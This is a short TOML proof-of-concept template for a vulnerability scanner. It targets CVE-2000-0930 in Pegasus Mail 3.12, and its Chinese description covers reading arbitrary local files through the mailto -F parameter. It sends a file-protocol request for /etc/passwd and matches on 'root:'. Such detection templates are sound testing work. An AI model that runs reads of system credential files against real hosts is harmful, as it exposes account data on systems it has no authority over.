[info]
author = "ave"
description = "验证 Pegasus Mail 3.12 是否可通过 mailto 协议的 -F 参数读取任意本地文件，触发文件转发功能导致敏感信息泄露"
id = "POC-AVE-2000-0681"
name = "CVE-2000-0930 PoC"
severity = "medium"
tags = ["ave-2000-0681"]
vuln_id = [
    "CVE-2000-0930",
    "AVE-2000-0681",
]

[poc]
logic = "all"

[[poc.requests]]
path = "/etc/passwd"
protocol = "file"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = ["root:"]
